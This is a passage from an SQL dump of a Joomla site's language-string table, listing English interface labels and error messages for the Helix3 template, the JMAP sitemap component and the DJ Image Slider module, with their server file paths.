Sizes','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3994,'HELIX_IMAGE_SMALL','Enable Small Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3995,'HELIX_IMAGE_SMALL_DESC','Enable small size image feature. Disable if not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3996,'HELIX_IMAGE_SMALL_SIZE','Small Image Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3997,'HELIX_IMAGE_SMALL_SIZE_DESC','Set the small image size in pixels. e.g 100X100','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3998,'HELIX_IMAGE_THUMBNAIL','Enable Thumbnail Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3999,'HELIX_IMAGE_THUMBNAIL_DESC','Enable image thumbnail feature. Disable if not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4000,'HELIX_IMAGE_THUMBNAIL_SIZE','Thumbnail Image Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4001,'HELIX_IMAGE_THUMBNAIL_SIZE_DESC','Set the thumbnail image size in pixels. e.g 200X200','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4002,'HELIX_IMAGE_MEDIUM','Enable Medium Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4003,'HELIX_IMAGE_MEDIUM_DESC','Enable medium size image feature. Disable if not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4004,'HELIX_IMAGE_MEDIUM_SIZE','Medium Image Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4005,'HELIX_IMAGE_MEDIUM_SIZE_DESC','Set the medium image size in pixels. e.g 300X300','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4006,'HELIX_IMAGE_LARGE','Enable Large Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4007,'HELIX_IMAGE_LARGE_DESC','Enable large size image feature. Disable if not required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4008,'HELIX_IMAGE_LARGE_SIZE','Large Image Size','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4009,'HELIX_IMAGE_LARGE_SIZE_DESC','Set the large image size in pixels. e.g 600X600','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4010,'HELIX_BLOG_LIST_IMAGE','Blog List Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4011,'HELIX_BLOG_LIST_IMAGE_DESC','Select an image size for blog list. By default if a featured image will be shown if available.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4012,'HELIX_BLOG_LIST_IMAGE_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4013,'HELIX_BLOG_LIST_IMAGE_SMALL','Small','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4014,'HELIX_BLOG_LIST_IMAGE_THUMBNAIL','Thumbnail','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4015,'HELIX_BLOG_LIST_IMAGE_MEDIUM','Medium','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4016,'HELIX_BLOG_LIST_IMAGE_LARGE','large','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4017,'COM_TEMPLATES_LICENSEUPDATE_FIELDSET_LABEL','<i class=\'fa fa-refresh\'></i> Update Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4018,'HELIX3_JOOMSHAPER_EMAIL','Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4019,'HELIX3_JOOMSHAPER_EMAIL_DESC','Enter your JoomShaper user account email address.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4020,'HELIX3_JOOMSHAPER_LICENSE_KEY','License Key','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4021,'HELIX3_JOOMSHAPER_LICENSE_KEY_DESC','Enter your subscription license key. You can get the license key your JoomShaper account dashboard.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4022,'COM_TEMPLATES_DOCUMENTATION_FIELDSET_LABEL','<i class=\'fa fa-book\'></i> Documentation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4023,'HELIX_CLICK_TO_VIEW','Click To View','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4024,'HELIX3_TEMPLATE_DOCUMENTATION','Template Documentation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4025,'HELIX3_TEMPLATE_DOCUMENTATION_DESC','Click the button to view template documentation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4026,'HELIX3_DOCUMENTATION','Helix3 Documentation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4027,'HELIX3_DOCUMENTATION_DESC','Click the button to view helix3 documentation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4028,'COM_TEMPLATES_MENUS_ASSIGNMENT','<i class=\'fa fa-check-square-o\'></i>Assignment','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4029,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT','Image Content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4030,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_DESC','Addon to add image and content together.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4031,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE','Addon Title','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4032,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE_DESC','Enter the title to the content block. Leave blank if no title is required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4033,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT','Content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4034,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT_DESC','Enter texts for the content block.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4035,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE','Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4036,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH','Width of the image section','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4037,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH_DESC','Set the width of the image section without % sign. eg. 50','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4038,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT','Image Position','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4039,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT_DESC','Set image section position to left or right.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4040,'HELIX_MONTH','Month','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4041,'HELIX_MONTHS','Months','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4042,'HELIX_DAY','Day','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4043,'HELIX_DAYS','Days','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4044,'HELIX_HOUR','Hour','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4045,'HELIX_HOURS','Hours','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4046,'HELIX_MINUTE','Minute','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4047,'HELIX_MINUTES','Minutes','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4048,'HELIX_SECOND','Second','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4049,'HELIX_SECONDS','Seconds','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4050,'HELIX_GO_BACK','Go Back Home','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4051,'HELIX_TAGS','Tags','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4052,'HELIX3_COUNT_RATING','Rating','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4053,'HELIX3_COUNT_RATINGS','Ratings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4054,'HELIX_SHARE_FACEBOOK','Share On Facebook','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4055,'HELIX_SHARE_TWITTER','Share On Twitter','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4056,'HELIX_SHARE_GOOGLE_PLUS','Share On Google Plus','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4057,'HELIX_SHARE_LINKEDIN','Share On Linkedin','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4058,'HELIX_SHARE_PINTERSET','Share On Pinterest','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(4059,'COM_IMAGERECYCLE','ImageRecycle','/home/smthsmth/public_html/components/com_imagerecycle/language/en-GB/en-GB.com_imagerecycle.ini'),(4060,'COM_DROPTABLE_VIEW_SUPPORT','Support','/home/smthsmth/public_html/components/com_imagerecycle/language/en-GB/en-GB.com_imagerecycle.ini'),(4061,'COM_JMAP_ERROR_RETRIEVING_DATA_FROM_USER_DATASOURCE','There is a settings error for user defined data source \'%s\', items can\'t be retrieved.<br/> Please check data source settings and activate data source debug mode to get more details about the error.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4062,'COM_JMAP_QUERY_NOT_ALLOWED_FROM_USER_DATASOURCE','Query for data source \'%s\' can\'t be executed because it\'s not allowed for security reason. Only SELECT statements are allowed.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4063,'COM_JMAP_SQLQUERY_EXPLAINED','Start SQL string...','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4064,'COM_JMAP_SQLQUERY_EXPLAINED_END','End SQL string','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4065,'COM_JMAP_ERROR_RETRIEVING_DATA','Error retrieving sitemap data for data source: \'%s\'','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4066,'COM_JMAP_ERROR_EXPORTING_SITEMAP','Error exporting XML sitemap','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4067,'COM_JMAP_ERROR_NO_CONTROLLER_FILE','No controller file found','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4068,'COM_JMAP_ERROR_NO_CONTROLLER','No controller found','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4069,'COM_JMAP_ERROR_MULTILEVELCATS_MANIFEST_ERROR','Error decoding manifest file for multilevel tree of folders. Please disable this feature from data source \'%s\' configuration.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4070,'COM_JMAP_ERROR_MULTILEVELCATS_MANIFEST_NOEXISTS','Manifest file for multilevel tree of folders needed for data source \'%s\' has not been found on server. Please disable this feature for this data source.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4071,'COM_JMAP_REQUIRES_J17PLUS','This feature requires Joomla version 1.7 and above, please upgrade!','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4072,'COM_JMAP_GEOSITEMAP_LOCATION','Location for: %s','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4073,'COM_JMAP_PAGE_NUMBER','Page #','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4074,'COM_JMAP_RESULTS_FROM','Results from #','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4075,'COM_JMAP_TOGGLER','Expand: ','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4076,'COM_JMAP_TOGGLER_ALL','all,','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4077,'COM_JMAP_TOGGLER_NONE','none','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4078,'COM_JMAP_ERROR_PLUGIN_DATASOURCE_NOT_EXISTS','The plugin data source %s is missing file in the plugins directory.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4079,'COM_JMAP_ERROR_PLUGIN_CLASS_NOT_EXISTS','The plugin class %s is not valid or found.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4080,'COM_JMAP_ERROR_PLUGIN_NODATA_RETURNED','Missing data returned by the plugin %s.','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4081,'COM_JMAP_ERROR_RETRIEVING_DATA_FROM_PLUGIN_DATASOURCE','An error occurred running the plugin, data source data are not retrieved: %s','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4082,'COM_JMAP_ERROR_EXTENSION_NOTINSTALLED','The extension %s required to use the plugin is not installed','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4083,'COM_JMAP_PRECACHING_ERROR_OPENING_FILE','Error opening file to store precached sitemap','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4084,'COM_JMAP_PRECACHING_ERROR_WRITING_FILE','Error writing on file to store precached sitemap, check file permissions for this path: server_root/components/com_jmap/precache','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4085,'COM_JMAP_PRECACHING_ERROR_CLOSING_FILE','Error during file close, check file permissions at this path: server_root/components/com_jmap/precache','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4086,'COM_JMAP_PRECACHING_ERROR_RENAMING_FILE','Error finalizing cache sitemap file, check file permissions at this path: server_root/components/com_jmap/precache','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4087,'COM_JMAP_GLOBAL_STATS_REPORT','Google Analytics Stats','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4088,'COM_JMAP_GOOGLEANALYTICS_SUCCESS_LOGOUT','Successfully logged out from Google Analytics','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4089,'COM_JMAP_GOOGLEANALYTICS_ERROR_LOGOUT','An error occurred during the logout from Google Analytics','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4090,'COM_JMAP_CRONJOB_FILEWRITTEN_SUCCESS','<?xml version=\'1.0\' encoding=\'UTF-8\'?><root><response>File \'%s\' written successfully to the root \'%s\'</response><filetosubmit>You can submit this sitemap URL to search engines: %s</filetosubmit><fileurl>%s</fileurl><filepath>%s</filepath></root>','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4091,'COM_JMAP_CRONJOB_FILEWRITTEN_ERROR','<?xml version=\'1.0\' encoding=\'UTF-8\'?><root><response>An error occurred during the generation and storeage of the file \'%s\' to the root \'%s\'</response></root>','/home/smthsmth/public_html/components/com_jmap/language/en-GB/en-GB.com_jmap.ini'),(4092,'MOD_DJIMAGESLIDER_NO_COMPONENT','There is no DJ Image Slider Component installed','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4093,'MOD_DJIMAGESLIDER_NO_CATEGORY_OR_ITEMS','There is no category chosen or category doesn\'t contain any items','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4094,'MOD_DJIMAGESLIDER_NO_CATALOG_OR_FILES','Folder doesn\'t exist or doesn\'t contain any images','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4095,'MOD_DJIMAGESLIDER_READMORE','Read more','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4096,'MOD_DJIMAGESLIDER_PREVIOUS','Previous','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4097,'MOD_DJIMAGESLIDER_NEXT','Next','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4098,'MOD_DJIMAGESLIDER_PLAY','Play','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4099,'MOD_DJIMAGESLIDER_PAUSE','Pause','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4100,'COM_MODULES_OTHER_FIELDSET_LABEL','Other Options','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4101,'MOD_DJIMAGESLIDER_SHOW_CUSTOM_NAVIGATION','Show indicators (dots/numbers)','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4102,'MOD_DJIMAGESLIDER_SHOW_CUSTOM_NAVIGATION_DESC','Show or hide slide indicators navigation. Displays direct indicator for each slide.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4103,'MOD_DJIMAGESLIDER_LINK_IMAGE','Link image','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4104,'MOD_DJIMAGESLIDER_LINK_IMAGE_DESC','Choose a behavior of clicked image. \'Open image in magnific/slimbox popup\' will open the clicked image in lightbox-like gallery. Magnific is used for Joomla!3.x while Slimbox is used for Joomla!2.5.x','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4105,'MOD_DJIMAGESLIDER_DONT_LINK','Don\'t link','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4106,'MOD_DJIMAGESLIDER_HYPERLINK','Hyperlink','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4107,'MOD_DJIMAGESLIDER_OPEN_IMAGE_IN_MODAL','Open image in modal','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4108,'MOD_DJIMAGESLIDER_SLIDE_WIDTH','Slide Width','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4109,'MOD_DJIMAGESLIDER_SLIDE_WIDTH_DESC','Single slide width in pixels.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4110,'MOD_DJIMAGESLIDER_SLIDE_HEIGHT','Slide Height','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4111,'MOD_DJIMAGESLIDER_SLIDE_HEIGHT_DESC','Single slide height in pixels.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4112,'MOD_DJIMAGESLIDER_FIT_SIZE_TO','Fit a size of image to','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4113,'MOD_DJIMAGESLIDER_FIT_SIZE_TO_DESC','Fit a size of image to slide height or width, second dimention will be proportional. If you want to display image on the left and description on the right, you should choose fitting an image size to slider height.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4114,'MOD_DJIMAGESLIDER_SLIDE_AUTO','Auto','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4115,'MOD_DJIMAGESLIDER_ON_MOUSE_OVER','On Mouse Over','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4116,'MOD_DJIMAGESLIDER_PRELOAD_DELAY_TIME','Preload delay time','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4117,'MOD_DJIMAGESLIDER_PRELOAD_DELAY_TIME_DESC','You can specify preloading time in miliseconds (1000 ms = 1 second). Leave empty or set to \'0\' to show slider when page will be loaded.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4118,'MOD_DJIMAGESLIDER_SLIDER_SOURCE','Slider source','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4119,'MOD_DJIMAGESLIDER_SLIDER_SOURCE_DESC','Choose whether the images will be taken from a folder or a DJ Image Slider component','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4120,'MOD_DJIMAGESLIDER_FOLDER','Folder','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4121,'MOD_DJIMAGESLIDER_COMPONENT','Component','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4122,'MOD_DJIMAGESLIDER_SLIDER_TYPE','Slider type','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4123,'MOD_DJIMAGESLIDER_SLIDER_TYPE_DESC','Display images vertically, horizontally or one image at once with fade effect','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4124,'MOD_DJIMAGESLIDER_VERTICAL','Vertical','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4125,'MOD_DJIMAGESLIDER_HORIZONTAL','Horizontal','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4126,'MOD_DJIMAGESLIDER_FADE','Fade','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4127,'MOD_DJIMAGESLIDER_FOLDER_AS_SOURCE_SETTINGS','FOLDER AS A SOURCE: SETTINGS','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4128,'MOD_DJIMAGESLIDER_IMAGE_FOLDER','Image Folder','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4129,'MOD_DJIMAGESLIDER_IMAGE_FOLDER_DESC','Type here path from joomla root folder to the image folder for slider, ex. images/sories/slides','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4130,'MOD_DJIMAGESLIDER_LINK','Link','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4131,'MOD_DJIMAGESLIDER_LINK_DESC','A URL to redirect to if the image is clicked upon (e.g. http://www.joomla.org or index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50).','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4132,'MOD_DJIMAGESLIDER_COMPONENT_AS_SOURCE_SETTINGS','COMPONENT AS A SOURCE: SETTINGS','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4133,'MOD_DJIMAGESLIDER_SLIDES_CATEGORY','Slides category','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4134,'MOD_DJIMAGESLIDER_SLIDES_CATEGORY_DESC','Choose DJ Image Slider category to display','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4135,'MOD_DJIMAGESLIDER_SHOW_TITLE','Show Title','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4136,'MOD_DJIMAGESLIDER_SHOW_TITLE_DESC','Show or hide slide titles','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4137,'MOD_DJIMAGESLIDER_SHOW_DESCRIPTION','Show description','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4138,'MOD_DJIMAGESLIDER_SHOW_DESCRIPTION_DESC','Show or hide slide descriptions','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4139,'MOD_DJIMAGESLIDER_SHOW_READMORE','Show readmore','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4140,'MOD_DJIMAGESLIDER_SHOW_READMORE_DESC','Show or hide readmore links','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4141,'MOD_DJIMAGESLIDER_READMORE_TEXT','Readmore text','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4142,'MOD_DJIMAGESLIDER_READMORE_TEXT_DESC','Change the text of readmore link. Leave empty to use default readmore text from language file','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4143,'MOD_DJIMAGESLIDER_LINK_TITLE','Link title','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4144,'MOD_DJIMAGESLIDER_LINK_TITLE_DESC','Make the slide titles linkable (as readmore)','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4145,'MOD_DJIMAGESLIDER_LINK_DESCRIPTION','Link description','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4146,'MOD_DJIMAGESLIDER_LINK_DESCRIPTION_DESC','Make the slide descriptions linkable (as readmore)','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4147,'MOD_DJIMAGESLIDER_DESCRIPTION_LIMIT','Description limit','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4148,'MOD_DJIMAGESLIDER_DESCRIPTION_LIMIT_DESC','Limit slide description to specified numer of characters (description will be cut after a word containing the character at specified position). Leave empty for no limit.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4149,'MOD_DJIMAGESLIDER_BASIC_SLIDER_SETTINGS','BASIC SLIDER SETTINGS','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4150,'MOD_DJIMAGESLIDER_SLIDER_DIMENSIONS','Slider dimensions will be calculate from values typed below.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4151,'MOD_DJIMAGESLIDER_VISIBLE_IMAGES','Visible Images','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4152,'MOD_DJIMAGESLIDER_VISIBLE_IMAGES_DESC','Number of displayed images at once.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4153,'MOD_DJIMAGESLIDER_SPACE_BETWEEN_IMAGES','Space between images','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4154,'MOD_DJIMAGESLIDER_SPACE_BETWEEN_IMAGES_DESC','Space beetween images in pixels.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4155,'MOD_DJIMAGESLIDER_MAX_IMAGES','Max images','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4156,'MOD_DJIMAGESLIDER_MAX_IMAGES_DESC','Set maximum number of images to be loaded into slider','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4157,'MOD_DJIMAGESLIDER_SORT_BY','Sort by','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4158,'MOD_DJIMAGESLIDER_SORT_BY_DESC','Sort slides by 